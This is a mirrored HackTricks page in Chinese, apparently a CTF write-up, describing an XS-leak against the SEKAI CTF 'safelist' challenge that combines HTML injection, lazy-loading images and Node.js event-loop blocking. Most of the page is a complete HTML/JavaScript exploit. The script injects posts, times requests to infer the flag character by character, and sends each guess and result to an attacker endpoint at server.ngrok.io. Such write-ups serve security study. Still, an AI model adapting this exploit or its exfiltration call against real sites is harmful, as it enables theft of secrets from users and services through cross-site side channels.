mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
7.7 KiB
7.7 KiB
阻塞事件循环 + 懒加载图片
☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家网络安全公司工作吗?你想在 HackTricks 中看到你的公司广告吗?或者你想获得PEASS 的最新版本或下载 HackTricks 的 PDF吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方 PEASS & HackTricks 商品
- 加入💬 Discord 群组 或 telegram 群组,或者关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks 仓库和hacktricks-cloud 仓库提交 PR 来分享你的黑客技巧。
在这个漏洞利用中,@aszx87410通过HTML注入混合使用了懒加载图片侧信道技术和一种阻塞事件循环技术来泄露字符。
这是一个针对已在以下页面中进行了评论的 CTF 挑战的不同漏洞利用。请查看有关挑战的更多信息:
{% content-ref url="connection-pool-example.md" %} connection-pool-example.md {% endcontent-ref %}
这个漏洞利用的思路是:
- 帖子按字母顺序加载
- 攻击者可以注入一个以**"A"开头的帖子**,然后一些HTML 标签(如一个大的**
<canvas)将占据大部分屏幕**,并且一些最终的**<img lazy标签**用于加载内容。 - 如果攻击者注入的是以**"z"开头的相同帖子而不是"A",那么带有标志的帖子将首先出现,然后注入的帖子将以初始的"z"和大的 canvas出现。因为带有标志的帖子首先出现,第一个 canvas 将占据整个屏幕,注入的最终
<img lazy标签在屏幕上看不见**,因此它们不会被加载。 - 然后,当机器人正在访问页面时,攻击者将发送获取请求。
- 如果帖子中注入的图片正在加载,这些获取请求将花费更长时间,因此攻击者知道帖子在标志之前(按字母顺序)。
- 如果获取请求很快,这意味着帖子在标志之后按字母顺序排列。
让我们来看看代码:
<!DOCTYPE html>
<html>
<!--
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
If images are loading, the request to "/" is slower, otherwise faster.
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
We can use fetch to measure the request time.
-->
<body>
<button onclick="run()">start</button>
<!-- Inject post with payload -->
<form id=f action="http://localhost:1234/create" method="POST" target="_blank">
<input id=inp name="text" value="">
</form>
<!-- Remove index -->
<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank">
<input id=inp2 name="index" value="">
</form>
<script>
let flag = 'SEKAI{'
const TARGET = 'https://safelist.ctf.sekai.team'
f.action = TARGET + '/create'
f2.action = TARGET + '/remove'
const sleep = ms => new Promise(r => setTimeout(r, ms))
// Function to leak info to attacker
const send = data => fetch('http://server.ngrok.io?d='+data)
const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')
// start exploit
let count = 0
setTimeout(async () => {
let L = 0
let R = charset.length - 1
// I have omited code here as apparently it wasn't necesary
// fallback to linerar since I am not familiar with binary search lol
for(let i=R; i>=L; i--) {
let c = charset[i]
send('try_' + flag + c)
const found = await testChar(flag + c)
if (found) {
send('found: '+ flag+c)
flag += c
break
}
}
}, 0)
async function testChar(str) {
return new Promise(resolve => {
/*
For 3350, you need to test it on your local to get this number.
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
If starts with "A", the image should be loaded because it's in the threshold.
*/
// <canvas height="3350px"> is experimental and allow to show the injected
// images when the post injected is the first one but to hide them when
// the injected post is after the post with the flag
inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
f.submit()
setTimeout(() => {
run(str, resolve)
}, 500)
})
}
async function run(str, resolve) {
// Open posts page 5 times
for(let i=1; i<=5;i++) {
window.open(TARGET)
}
let t = 0
const round = 30 //Lets time 30 requests
setTimeout(async () => {
// Send 30 requests and time each
for(let i=0; i<round; i++) {
let s = performance.now()
await fetch(TARGET + '/?test', {
mode: 'no-cors'
}).catch(err=>1)
let end = performance.now()
t += end - s
console.log(end - s)
}
const avg = t/round
// Send info about how much time it took
send(str + "," + t + "," + "avg:" + avg)
/*
I get this threshold(1000ms) by trying multiple times on remote admin bot
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
*/
const isFound = (t >= 1000)
if (isFound) {
inp2.value = "0"
} else {
inp2.value = "1"
}
// remember to delete the post to not break our leak oracle
f2.submit()
setTimeout(() => {
resolve(isFound)
}, 200)
}, 200)
}
</script>
</body>
</html>
☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家网络安全公司工作吗?想要在HackTricks中看到你的公司广告吗?或者你想要获取PEASS的最新版本或下载HackTricks的PDF吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入💬 Discord群组 或者 telegram群组 或者 关注我在Twitter上的🐦@carlospolopm.
- 通过向hacktricks repo和hacktricks-cloud repo提交PR来分享你的黑客技巧。